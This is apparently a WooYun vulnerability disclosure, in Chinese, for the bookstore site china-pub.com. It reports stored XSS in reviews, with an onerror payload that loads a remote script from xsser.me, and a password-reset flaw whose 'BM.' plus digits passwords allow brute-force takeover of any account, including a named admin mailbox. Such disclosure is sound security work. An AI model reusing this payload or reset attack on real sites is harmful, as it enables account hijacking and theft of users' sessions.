WooYun.org

2处存储xss
img src="/upload/201309/06040823f04602f22f4bbf8fb58246df2fd61e99.jpg" alt="1.jpg" />
在书评的地方 如：http://product.china-pub.com/member/bookpinglun/viewpinglun.asp?id=222772
我的评论的地方

收到xss，这是你们机制问题。
<TD class="pro_pl_m"><div style="width:635px;overflow:auto;">这本书早在一年前就看过电子版了，还是看了几遍，真的很喜欢作者。之前去亚马逊跟当当买都一直缺货，还好还是被我找到了这本书，真的很喜欢。</div>
后台审核过了的话就是一个存储的xss。

<
));"><img src=l onerror=e=document.createElement('script');e.setAttribute('src','//xsser.me/9NkBwy?1353065417');document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639
还一处就是修改任意用户密码能暴破+社工。完全可以 如
1.
您好！
您在互动出版网（www.china-pub.com）点击了“忘记密码”按钮，故系统自动为您发送了这封邮件。系统为您生成了新的密码：
您的新密码为：BM.353
您好！
您在互动出版网（www.china-pub.com）点击了“忘记密码”按钮，故系统自动为您发送了这封邮件。系统为您生成了新的密码：
您的新密码为：BM.3061
您好！
您在互动出版网（www.china-pub.com）点击了“忘记密码”按钮，故系统自动为您发送了这封邮件。系统为您生成了新的密码：
您的新密码为：BM.718
您好！
您在互动出版网（www.china-pub.com）点击了“忘记密码”按钮，故系统自动为您发送了这封邮件。系统为您生成了新的密码：
您的新密码为：BM.8289
点击了“忘记密码”按钮，故系统自动为您发送了这封邮件。系统为您生成了新的密码：
您的新密码为：BM.747
您好！
您在互动出版网（www.china-pub.com）点击了“忘记密码”按钮，故系统自动为您发送了这封邮件。系统为您生成了新的密码：
您的新密码为：BM.9148
密码头：BM.
修改的密码都是BM.+100-999 就是爆破的话最多900次就能进去。
认证机制太有问题了，直接就是改密码这这最少应该都加个点击吧。
如管理注册账号的邮箱：member@china-pub.com
就能直接找回密码暴破。

//if( m== ''){
	
	//	document.getElementById('member_m').innerHTML = ('<img src="http://www.china-pub.com/images/shouye2012/item_w.png" hspace="5" align="absmiddle" />用户名不能为空！');
		 
	//	return false;

管理把用户名认证给- - 了
这样就能直接把任何会员的密码都修改。
2.
还一处问题就是 手机验证
对手机验证不合理，如wooyun上很多这个手机验证的例子。
对错误次数没有认证。

验证码是可以无限自己提交的